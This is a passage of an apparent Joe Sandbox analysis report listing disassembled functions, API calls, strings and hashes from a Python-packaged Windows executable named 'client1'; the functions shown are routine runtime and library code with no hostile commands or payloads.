                                                    • Opcode ID: 2dc19ef5ba30c1755b370eb24f27a07330b7d4ecbeaa7c6206d14ea3a4c7ebc1
                                                    • Instruction ID: 10210cae02a5da7580aa32472d1a66e78c26cbe670e770a5c560e5b427f1dcde
                                                    • Opcode Fuzzy Hash: 2dc19ef5ba30c1755b370eb24f27a07330b7d4ecbeaa7c6206d14ea3a4c7ebc1
                                                    • Instruction Fuzzy Hash: 9E315E11B187C240FA30BB31E9552FAD25AAF98784FC40431DA6E96BDAEE2DE5048721
                                                    Function 00007FF79F627A30 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 68COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32 ref: 00007FF79F627A6A
                                                      • Part of subcall function 00007FF79F622620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF79F627744,?,?,?,?,?,?,?,?,?,?,?,00007FF79F62101D), ref: 00007FF79F622654
                                                      • Part of subcall function 00007FF79F622620: MessageBoxW.USER32 ref: 00007FF79F62272C
                                                    • MultiByteToWideChar.KERNEL32 ref: 00007FF79F627AF0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$ErrorLastMessage
                                                    • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                    • API String ID: 3723044601-876015163
                                                    • Opcode ID: a067ef3949ab1c43b8cad70a8c207a907739284b21da8d2c9820fdf83144c31f
                                                    • Instruction ID: 9f2e00563ab7892172867902b63dd349e0876b4b8af7bc4b5835a1d096cd09be
                                                    • Opcode Fuzzy Hash: a067ef3949ab1c43b8cad70a8c207a907739284b21da8d2c9820fdf83144c31f
                                                    • Instruction Fuzzy Hash: 77214422B08B8281EB60FB35F8400E9E366FF85794F944531DB6C93BA9EF2DD5418710
                                                    Function 00007FFBAB4A0E45 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Item$Dict_Err_FormatFromObject_Unicode_$AttrClearErrorFilenameImportModule_Object
                                                    • String ID: <module>
                                                    • API String ID: 2466898028-217463007
                                                    • Opcode ID: 6b8acac036cbf7e295481d1c2732eb526df169ef99cb2573ea467a0dbd242c8b
                                                    • Instruction ID: 5cee9c463810e5ef46d1b4f8326721a4aba3c8d2ce0824f9d82c84c4c67b59f1
                                                    • Opcode Fuzzy Hash: 6b8acac036cbf7e295481d1c2732eb526df169ef99cb2573ea467a0dbd242c8b
                                                    • Instruction Fuzzy Hash: CE2157E1A0BA1681FA169B77E8902792BA0AF14BC4F44C13DDE2D077B0EF2CA4918340
                                                    Function 00007FF79F63A620 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,?,00007FF79F642433,?,?,?,00007FF79F63CB8C,?,?,00000000,00007FF79F633A5F,?,?,?,00007FF79F639313), ref: 00007FF79F63A62F
                                                    • FlsGetValue.KERNEL32(?,?,?,00007FF79F642433,?,?,?,00007FF79F63CB8C,?,?,00000000,00007FF79F633A5F,?,?,?,00007FF79F639313), ref: 00007FF79F63A644
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF79F642433,?,?,?,00007FF79F63CB8C,?,?,00000000,00007FF79F633A5F,?,?,?,00007FF79F639313), ref: 00007FF79F63A665
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF79F642433,?,?,?,00007FF79F63CB8C,?,?,00000000,00007FF79F633A5F,?,?,?,00007FF79F639313), ref: 00007FF79F63A692
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF79F642433,?,?,?,00007FF79F63CB8C,?,?,00000000,00007FF79F633A5F,?,?,?,00007FF79F639313), ref: 00007FF79F63A6A3
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF79F642433,?,?,?,00007FF79F63CB8C,?,?,00000000,00007FF79F633A5F,?,?,?,00007FF79F639313), ref: 00007FF79F63A6B4
                                                    • SetLastError.KERNEL32(?,?,?,00007FF79F642433,?,?,?,00007FF79F63CB8C,?,?,00000000,00007FF79F633A5F,?,?,?,00007FF79F639313), ref: 00007FF79F63A6CF
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Value$ErrorLast
                                                    • String ID:
                                                    • API String ID: 2506987500-0
                                                    • Opcode ID: 6b14f4b34ada3312421ba959f39f9715d9be68c8868fa5de67aefdf45a5e0ce4
                                                    • Instruction ID: 7d43b17c794f12c4ac64cc17aac40b9b2e6bd3271b368f03124712aa789b55af
                                                    • Opcode Fuzzy Hash: 6b14f4b34ada3312421ba959f39f9715d9be68c8868fa5de67aefdf45a5e0ce4
                                                    • Instruction Fuzzy Hash: 8E213824E0C7D242FA78B73156511FAE24B5F56BB0F840734E83E07AD6DEADB400A630
                                                    Function 00007FFBAA707F30 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err_$Arg_DeallocFreeKeywordsMem_MemoryParseStringTuple
                                                    • String ID: optional argument must be a context
                                                    • API String ID: 955997460-3732962867
                                                    • Opcode ID: 7476e3eac392aa3e17da684dcdc0e466eacd9f7d3d7383a05109996a5e4262bf
                                                    • Instruction ID: 6dc461ae8a81eb74eb1cd8f7960e357c4f687b4e97e544687930f8f6bc071d8f
                                                    • Opcode Fuzzy Hash: 7476e3eac392aa3e17da684dcdc0e466eacd9f7d3d7383a05109996a5e4262bf
                                                    • Instruction Fuzzy Hash: BC213DA1A1AB03D1EA129F35E8500BB67A9FF84B80F4000B2DD5D577A4EE2DF45BC760
                                                    Function 00007FFBAB4A0BC7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Err_FormatFromItemObject_Unicode_$AttrClearDict_ErrorFilenameImportList_Module_Object
                                                    • String ID: <module>
                                                    • API String ID: 705353228-217463007
                                                    • Opcode ID: 4e5f990220d73f4e6b8073e872d95d55646c66385a8aa30aefa6814886ffe265
                                                    • Instruction ID: b91506569afd215d6a3be0ca44e2c87c27df3794c86daccdb6b433fb163c7f5b
                                                    • Opcode Fuzzy Hash: 4e5f990220d73f4e6b8073e872d95d55646c66385a8aa30aefa6814886ffe265
                                                    • Instruction Fuzzy Hash: 76211DE5A0BA1280FA279F77E99427867A5AF14BD4F08C13ECD3D077B4DE2CA4958301
                                                    Function 00007FFBAB4A0AE3 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Err_FormatFromItemObject_Unicode_$AttrClearDict_ErrorFilenameImportList_Module_Object
                                                    • String ID: <module>
                                                    • API String ID: 705353228-217463007
                                                    • Opcode ID: 879e76747261c4a6ae7e890e62059d6275078ca7420713bb20aac4bf1ddc663c
                                                    • Instruction ID: aa984bd2d180805f7e3ef5466b819f273b61855efce99710dd6c8545d8710b5d
                                                    • Opcode Fuzzy Hash: 879e76747261c4a6ae7e890e62059d6275078ca7420713bb20aac4bf1ddc663c
                                                    • Instruction Fuzzy Hash: 7121EAE6E0BA0281EA178F77E99427967A1AF14BD9F08C13DCD2D077B0DE2CA4958301
                                                    Function 00007FFBAA734B40 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    • Associated: 00000002.00000002.2693275344.00007FFBAA730000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA735000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA792000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7DE000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E1000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E6000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA840000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693474597.00007FFBAA843000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693491810.00007FFBAA845000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa730000_client1.jbxd
                                                    Similarity
                                                    • API ID: Arg_$ArgumentCheckPositionalReadyUnicode_
                                                    • String ID: a unicode character$argument 1$name
                                                    • API String ID: 3545102714-4190364640
                                                    • Opcode ID: dd7e525c6f15f79c0475ece0fbfed555bc2cf029fe1f0485a725b85a65e47b36
                                                    • Instruction ID: bde4f137897cf522e20f3da755de1ab20c67c2098a0a7e61852747b34b94f6c7
                                                    • Opcode Fuzzy Hash: dd7e525c6f15f79c0475ece0fbfed555bc2cf029fe1f0485a725b85a65e47b36
                                                    • Instruction Fuzzy Hash: 3521A1B1B0AA96C5EB55EF22E4402AA2368EB44B84F4540B5DE4D47754CF2CE847C330
                                                    Function 00007FFBAA734C90 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    • Associated: 00000002.00000002.2693275344.00007FFBAA730000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA735000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA792000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7DE000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E1000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E6000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA840000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693474597.00007FFBAA843000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693491810.00007FFBAA845000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa730000_client1.jbxd
                                                    Similarity
                                                    • API ID: Arg_$ArgumentCheckPositionalReadyUnicode_
                                                    • String ID: a unicode character$argument 1$numeric
                                                    • API String ID: 3545102714-2385192657
                                                    • Opcode ID: 35c9d41c65e7a6057b424292e649dab30af98cc9056b9a63245a5d832090e137
                                                    • Instruction ID: 21169802ce1ee58fe1b240cfea16f405d7d8eb8c63b87688e3e3ea0de472e94a
                                                    • Opcode Fuzzy Hash: 35c9d41c65e7a6057b424292e649dab30af98cc9056b9a63245a5d832090e137
                                                    • Instruction Fuzzy Hash: FD21DEB2B0AA96C5EB55AF22E4441AA2368EB44B84F5940B5DF1D43364CF2CE457C330
                                                    Function 00007FFBAA7342BC Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    • Associated: 00000002.00000002.2693275344.00007FFBAA730000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA735000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA792000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7DE000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E1000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E6000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA840000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693474597.00007FFBAA843000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693491810.00007FFBAA845000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa730000_client1.jbxd
                                                    Similarity
                                                    • API ID: Arg_$ArgumentCheckPositionalReadyUnicode_
                                                    • String ID: a unicode character$argument 1$decimal
                                                    • API String ID: 3545102714-2474051849
                                                    • Opcode ID: 37a4153ce9cd5952ba336a7a13e7d13d1a4106d113bef46bdc421c90457116d1
                                                    • Instruction ID: 30adb9bd0b89d3930804dbb1056e009589ea1bdb3651b833de3c703945fb5713
                                                    • Opcode Fuzzy Hash: 37a4153ce9cd5952ba336a7a13e7d13d1a4106d113bef46bdc421c90457116d1
                                                    • Instruction Fuzzy Hash: 4721CDB1B1AA92C6EB55AF22E4401AA636CFB44B88F4940B5CE4D57764CF2DE447C320
                                                    Function 00007FF79F64706C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                    • String ID: CONOUT$
                                                    • API String ID: 3230265001-3130406586
                                                    • Opcode ID: 1a41989b306c04176fbb8ce5d038fb17b2eb18ca34d01c5ff4cda60dd112554e
                                                    • Instruction ID: 810f57fa96b3e569063fe0804fcb4f4afbcab54fabd34b9d9e30289ec406c851
                                                    • Opcode Fuzzy Hash: 1a41989b306c04176fbb8ce5d038fb17b2eb18ca34d01c5ff4cda60dd112554e
                                                    • Instruction Fuzzy Hash: D9118421718B8286F760BB22E854369B7AAFB58FE4F840234D96D87794CF3CD404C750
                                                    Function 00007FFBAA716F24 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    • invalid decimal point or unsupported combination of LC_CTYPE and LC_NUMERIC, xrefs: 00007FFBAA716F53
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: StringUnicode_$CharDeallocErr_FromWidembstowcs
                                                    • String ID: invalid decimal point or unsupported combination of LC_CTYPE and LC_NUMERIC
                                                    • API String ID: 4243716454-835262532
                                                    • Opcode ID: be6c2bc1afa28818636f2753519d6f4b24a3387ec2e2e3dcba228cf474a20bef
                                                    • Instruction ID: 10c870dcc50133397b33dabef1c39e702f61c0818b364de84676a2e9afbfa3e5
                                                    • Opcode Fuzzy Hash: be6c2bc1afa28818636f2753519d6f4b24a3387ec2e2e3dcba228cf474a20bef
                                                    • Instruction Fuzzy Hash: 8C0162A1B1AA02C1EF028F31E84457A67E8AF48BC0F045472ED0E467B4EE3DE447C310
                                                    Function 00007FFBAA70C3CC Relevance: 9.2, APIs: 6, Instructions: 169COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • memmove.VCRUNTIME140(00000001,00000000,?,00000000,?,00000001,00000002,00007FFBAA70C171), ref: 00007FFBAA70C4EC
                                                    • memmove.VCRUNTIME140(00000001,00000000,?,00000000,?,00000001,00000002,00007FFBAA70C171), ref: 00007FFBAA70C543
                                                    • memmove.VCRUNTIME140(00000001,00000000,?,00000000,?,00000001,00000002,00007FFBAA70C171), ref: 00007FFBAA70C553
                                                    • memmove.VCRUNTIME140(00000001,00000000,?,00000000,?,00000001,00000002,00007FFBAA70C171), ref: 00007FFBAA70C5CB
                                                    • PyMem_Free.PYTHON311(00000001,00000000,?,00000000,?,00000001,00000002,00007FFBAA70C171), ref: 00007FFBAA70C622
                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000001,00000000,?,00000000,?,00000001,00000002,00007FFBAA70C171), ref: 00007FFBAA70C66E
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: memmove$FreeMem_abort
                                                    • String ID:
                                                    • API String ID: 100173348-0
                                                    • Opcode ID: 2c6e3f68204004541e7d797dec9d17c50c8afdb5f668a568ec833fb38442b9e8
                                                    • Instruction ID: 82331e22a75f51f7712918e1b2f0170a769afc82db6fae61353043f505fa1004
                                                    • Opcode Fuzzy Hash: 2c6e3f68204004541e7d797dec9d17c50c8afdb5f668a568ec833fb38442b9e8
                                                    • Instruction Fuzzy Hash: 066191B260AB45D1DA62CF16F4502ABB7A8FB88BC4F540132EE8D57B69DE3CD146C710
                                                    Function 00007FFBAB492BF0 Relevance: 9.1, APIs: 6, Instructions: 100COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PyLong_FromSsize_t.PYTHON311 ref: 00007FFBAB492C50
                                                    • PyLong_FromSsize_t.PYTHON311 ref: 00007FFBAB492C76
                                                    • PyNumber_Remainder.PYTHON311 ref: 00007FFBAB492C93
                                                    • _Py_Dealloc.PYTHON311 ref: 00007FFBAB492CA5
                                                    • _Py_Dealloc.PYTHON311 ref: 00007FFBAB492CB4
                                                    • _Py_Dealloc.PYTHON311 ref: 00007FFBAB492D09
                                                      • Part of subcall function 00007FFBAB493450: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FFBAB49286B), ref: 00007FFBAB493459
                                                      • Part of subcall function 00007FFBAB493450: fprintf.MSPDB140-MSVCRT ref: 00007FFBAB493469
                                                      • Part of subcall function 00007FFBAB493450: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FFBAB49286B), ref: 00007FFBAB493473
                                                      • Part of subcall function 00007FFBAB493450: fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FFBAB49286B), ref: 00007FFBAB49347C
                                                      • Part of subcall function 00007FFBAB493450: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFBAB49286B), ref: 00007FFBAB493482
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$FromLong_Ssize_t__acrt_iob_func$Number_Remainderabortfflushfprintf
                                                    • String ID:
                                                    • API String ID: 1333916573-0
                                                    • Opcode ID: 988bd1455c911e46e63481f5793d118fb64da56076abf6250ab8b5c248bcde97
                                                    • Instruction ID: 127697ef2990c1688bf856a74ea70a18d363882621128856b47e9513aaca2d5d
                                                    • Opcode Fuzzy Hash: 988bd1455c911e46e63481f5793d118fb64da56076abf6250ab8b5c248bcde97
                                                    • Instruction Fuzzy Hash: 8031A6B1F0BA4642EE564B3AE59427D5361AF55FE4F089234DE7E077E9DE2CE4828300
                                                    Function 00007FFBAA7027F4 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$ContextErr_FormatObject_SubtypeType_Var_
                                                    • String ID:
                                                    • API String ID: 2679858911-0
                                                    • Opcode ID: 12b4c4cf3228bb0d2d143253dfe1ec6c57aca567516acc9888419e859067e15b
